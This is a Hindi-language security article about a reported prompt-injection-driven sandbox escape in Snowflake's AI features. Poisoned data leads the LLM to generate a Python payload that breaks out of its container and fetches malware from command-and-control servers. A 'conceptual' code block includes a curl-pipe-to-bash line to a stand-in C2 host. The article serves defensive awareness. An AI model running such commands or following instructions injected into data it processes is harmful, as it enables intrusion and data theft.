Snowflake AI ने सैंडबॉक्स को चकमा देकर चलाया मालवेयर
#इंट्रोडक्शन
जेनरेटिव AI को सीधे क्लाउड डेटा वेयरहाउस में इंटीग्रेट करने से आर्गेनाइजेशन्स के डेटा को प्रोसेस करने, क्वेरी करने और उससे इनसाइट्स निकालने के तरीके में एक क्रांति आ गई है। Snowflake जैसे प्लेटफॉर्म्स ने अपनी AI कैपेबिलिटीज को बहुत तेज़ी से एक्सपैंड किया है, जिससे यूज़र्स लार्ज लैंग्वेज मॉडल्स (LLMs) रन कर सकते हैं और पेटाबाइट्स सेंसिटिव इन्फॉर्मेशन पर AI-जेनरेटेड कोड एग्जीक्यूट कर सकते हैं, वह भी डेटा को पेरिमीटर से बाहर भेजे बिना।
हालांकि, नेचुरल लैंग्वेज प्रोसेसिंग को आर्बिट्रेरी कोड एग्जीक्यूशन के साथ मिलाने से नए तरह के अटैक सरफेस बन जाते हैं। हाल ही में PromptArmor द्वारा पब्लिश की गई एक रिपोर्ट, जिसने Hacker News पर काफी ध्यान खींचा, एक गंभीर वल्नेरेबिलिटी की डिटेल देती है: Snowflake के अंदर एक AI सैंडबॉक्स एस्केप जिसने अटैकर्स को अंडरलाइंग कंप्यूट इन्फ्रास्ट्रक्चर पर मेलिशियस कोड एग्जीक्यूट करने की परमिशन दे दी। यह घटना AI लॉजिक और सिस्टम-लेवल सिक्योरिटी के बीच की कमज़ोर बाउंड्री को हाईलाइट करती है, और मॉडर्न डेटा स्टैक्स को सिक्योर करने वाले सिक्योरिटी इंजीनियर्स के लिए एक वेक-अप कॉल है।
#क्या हुआ था
वल्नेरेबिलिटी डिस्क्लोज़र के अनुसार, यह एक्सप्लॉइट चेन कोई ट्रेडिशनल बफर ओवरफ्लो या कोई सिंपल मिसकॉन्फ़िगरेशन नहीं था। इसके बजाय, यह एक मल्टी-स्टेज अटैक था जिसने LLM कोड जेनरेशन और एग्जीक्यूशन एनवायरनमेंट्स के नेचर का ही फायदा उठाया।
यह अटैक indirect prompt injection के ज़रिए शुरू हुआ। अटैकर्स ने कस्टमर फीडबैक लॉग्स या JSON पेलोड्स जैसे दिखने में सेफ डेटा सोर्सेज में एक खास तरह से क्राफ्ट किया हुआ टेक्स्ट इन्सर्ट किया, जिसे बाद में Snowflake टेबल्स में इंजस्ट कर लिया गया। जब किसी यूज़र या ऑटोमेटेड पाइपलाइन ने कोई Snowflake AI फंक्शन (जैसे कि Snowpark या Cortex का यूज़ करके समरी जेनरेट करना या सेंटीमेंट एनालिसिस रन करना) इन्वोक किया, तो LLM ने इस पॉइज़न्ड डेटा को प्रोसेस किया।
इस क्राफ्टेड प्रॉम्प्ट ने AI मॉडल को मैनिपुलेट करके एक स्पेसिफिक Python पेलोड जेनरेट करवाया। हालांकि Snowflake ऐसे AI-जेनरेटेड स्क्रिप्ट्स को एक बहुत ही रिस्ट्रिक्टेड, कंटेनराइज़्ड Python सैंडबॉक्स (जिसे नेटवर्क एक्सेस और सिस्टम कॉल्स को रोकने के लिए डिज़ाइन किया गया है) के अंदर एग्जीक्यूट करता है, लेकिन जेनरेट किए गए पेलोड ने अंडरलाइंग सैंडबॉक्स इम्प्लीमेंटेशन की एक वल्नेरेबिलिटी को टारगेट किया। रनटाइम के नेमस्पेस आइसोलेशन या कमज़ोर सेक्कॉम्प (seccomp) प्रोफाइल में एक खामी का फायदा उठाकर, पेलोड कंटेनर से बाहर निकलने में सफल रहा।
एक बार जब सैंडबॉक्स ब्रीच हो गया, तो पेलोड ने होस्ट कंप्यूट नोड पर रिमोट कोड एग्जीक्यूशन (RCE) अचीव कर लिया। वहाँ से, इसने सेकेंडरी मालवेयर पेलोड्स को डाउनलोड और एग्जीक्यूट करने के लिए कमांड-एंड-कंट्रोल (C2) सर्वर्स के साथ आउटबाउंड कनेक्शंस इनिशिएट किए।
#यह क्यों मायने रखता है
एक डेटा वेयरहाउस के अंदर RCE वल्नेरेबिलिटी के परिणाम बहुत ही भयानक हो सकते हैं। डेटा प्लेटफॉर्म्स एंटरप्राइज़ डेटा प्राइवेसी के लिए अल्टीमेट सिंगल पॉइंट ऑफ़ फेलियर होते हैं।
- मैसिव ब्लास्ट रेडियस: Snowflake के अंदर एक कॉम्प्रोमाइज्ड कंप्यूट नोड के पास आर्गेनाइजेशन के सबसे सेंसिटिव डेटा, जिसमें PII, फाइनेंसियल रिकॉर्ड्स और प्रोप्राइटरी इंटेलेक्चुअल प्रॉपर्टी शामिल हैं, का डायरेक्ट, हाई-बैंडविड्थ एक्सेस होता है।
- शेयर्ड रिस्पॉन्सिबिलिटी मॉडल का कमज़ोर होना: क्लाउड प्रोवाइडर्स इस बात पर ज़ोर देते हैं कि उनकी मैनेज्ड सर्विसेज़ सिक्योर, आइसोलेटेड एग्जीक्यूशन एनवायरनमेंट प्रोवाइड करती हैं। एक सैंडबॉक्स एस्केप इस भरोसे को तोड़ देता है, यह दिखाते हुए कि मैनेज्ड AI फीचर्स ट्रोजन हॉर्स बन सकते हैं।
- डिटेक्शन इवेज़न: क्योंकि इनिशियल वेक्टर ट्रेडिशनल नेटवर्क ट्रैफिक या मेलिशियस बाइनरीज़ के बजाय डेटा (डेटाबेस में टेक्स्ट) था, ट्रेडिशनल एंडपॉइंट डिटेक्शन एंड रिस्पांस (EDR) और वेब एप्लीकेशन फायरवॉल्स (WAF) फाइनल पेलोड एग्जीक्यूशन होने तक इस अटैक से पूरी तरह अनजान थे।
#टेक्निकल इम्प्लीकेशन्स
यह एक्सप्लॉइट AI और सिस्टम्स इंजीनियरिंग के इंटरसेक्शन पर कई क्रिटिकल टेक्निकल चैलेंजेज को अंडरस्कोर करता है:
#Data-as-Code रिस्क्स
जब हम LLMs को आर्बिट्रेरी डेटा पढ़ने और बाद में उस डेटा के आधार पर कोड लिखने और एग्जीक्यूट करने की परमिशन देते हैं, तो हम फंडामेंटली डेटा को एग्जीक्यूटेबल कोड की तरह ट्रीट कर रहे होते हैं। अगर AI बिना स्ट्रिक्ट सिमेंटिक वैलिडेशन के एक इंटरप्रेटर के रूप में काम करता है, तो सिस्टम इंजेक्शन अटैक्स के प्रति बहुत वल्नेरेबल हो जाता है।
# A conceptual example of the sandbox escape payload
import os
import ctypes
# 1. The LLM is tricked into generating code that accesses low-level memory
# or exploits a known vulnerability in a native library allowed in the sandbox.
libc = ctypes.CDLL("libc.so.6")
# 2. Bypassing container constraints (e.g., escaping a chroot or exploiting a kernel flaw)
# 3. Executing the malware dropper
os.system("curl -s http://malicious-c2.example/payload.sh | bash")
#कंटेनर आइसोलेशन की लिमिट्स
कंटेनर्स एब्सोल्यूट सिक्योरिटी बाउंड्रीज़ नहीं हैं। वे namespaces और cgroups जैसे कर्नेल फीचर्स पर रिलाय करते हैं। अगर कर्नेल में ही कोई अनपैच्ड वल्नेरेबिलिटी है, या अगर कंटेनर रनटाइम (जैसे runc या crun) मिसकॉन्फ़िगर्ड है, तो एक सोफिस्टिकेटेड पेलोड एस्केप कर सकता है। AI के कॉन्टेक्स्ट में, जहाँ एनवायरनमेंट्स को अक्सर वेरियस डेटा साइंस लाइब्रेरीज़ (Pandas, PyTorch, आदि) के साथ डायनामिकली प्रोविज़न किया जाना चाहिए, सैंडबॉक्स का अटैक सरफेस एक स्टैण्डर्ड माइक्रोसर्विस से कहीं बड़ा होता है।
#नेटवर्क एग्रेस ही लास्ट लाइन ऑफ़ डिफेन्स है
यह फैक्ट कि एस्केप्ड पेलोड एक्सटर्नल मालवेयर डाउनलोड करने में सक्षम था, नेटवर्क एग्रेस कंट्रोल्स में एक फेलियर को इंडिकेट करता है। अनट्रस्टेड, AI-जेनरेटेड कोड एग्जीक्यूट करने वाले कंप्यूट नोड्स को पब्लिक इंटरनेट के ज़ीरो एक्सेस के साथ एक स्ट्रिक्टली एयर-गैप्ड नेटवर्क एनवायरनमेंट में काम करना चाहिए।
#आगे क्या
Snowflake और अन्य क्लाउड डेटा प्रोवाइडर्स निस्संदेह अपने कंटेनर रनटाइम्स को हार्डन करने और AI-जेनरेटेड कोड की कैपेबिलिटीज को रिस्ट्रिक्ट करने के लिए इमीडियेट पैचेस रोल आउट करेंगे। हालांकि, आर्गेनाइजेशन्स सिक्योरिटी के लिए पूरी तरह से प्लेटफॉर्म प्रोवाइडर पर रिलाय नहीं कर सकती हैं।
इंजीनियरिंग टीम्स को एक ज़ीरो-ट्रस्ट AI आर्किटेक्चर अडॉप्ट करना होगा:
- LLM फायरवॉल्स: इंटरमीडिएट वैलिडेशन लेयर्स इम्प्लीमेंट करें जो AI को दिए गए इनपुट्स और एग्जीक्यूशन से पहले उसके द्वारा जेनरेट किए गए कोड की स्ट्रक्चरल सेफ्टी दोनों को एनालाइज़ करें।
- स्ट्रिक्ट एग्रेस पॉलिसीज़: यह सुनिश्चित करें कि डेटा वेयरहाउस कंप्यूट नोड्स को होस्ट करने वाले वर्चुअल प्राइवेट क्लाउड्स (VPCs) में एक्सप्लिसिट डेनी-ऑल आउटबाउंड नेटवर्क रूल्स हों। अगर कोई प्रोसेस सैंडबॉक्स से एस्केप कर जाता है, तो उसे बाहर कांटेक्ट करने में सक्षम नहीं होना चाहिए।
- डेटा सैनिटाइजेशन: AI प्रोसेसिंग के लिए डेस्टिन्ड सभी अनस्ट्रक्चर्ड डेटा को अनट्रस्टेड यूज़र इनपुट के रूप में ट्रीट करें। लैंग्वेज मॉडल्स द्वारा एनालाइज़ किए जाने से पहले टेक्स्ट फील्ड्स से एग्जीक्यूटेबल सिंटैक्स को सैनिटाइज़ और स्ट्रिप करें।
#निष्कर्ष
"Snowflake AI Sandbox Escape" AI सिक्योरिटी के लिए एक वाटरशेड मोमेंट है। यह डेमोंस्ट्रेट करता है कि प्रॉम्प्ट इंजेक्शन और LLM-ड्रिवेन कोड एग्जीक्यूशन के थ्योरेटिकल रिस्क्स प्रोडक्शन एनवायरनमेंट्स में हाईली प्रैक्टिकल और अविश्वसनीय रूप से खतरनाक हैं। जैसे-जैसे हम अपने कोर डेटा इन्फ्रास्ट्रक्चर में इंटेलिजेंट कैपेबिलिटीज को इंटीग्रेट करना जारी रखते हैं, हमें इन नए फीचर्स की सोफिस्टिकेशन को समान रूप से सोफिस्टिकेटेड, डिफेन्स-इन-डेप्थ सिक्योरिटी इंजीनियरिंग के साथ मैच करना होगा। AI एक पावरफुल टूल हो सकता है, लेकिन बिना रिजिड, सिस्टम-लेवल कंटेनमेंट के, यह एक बहुत बड़ी लायबिलिटी है।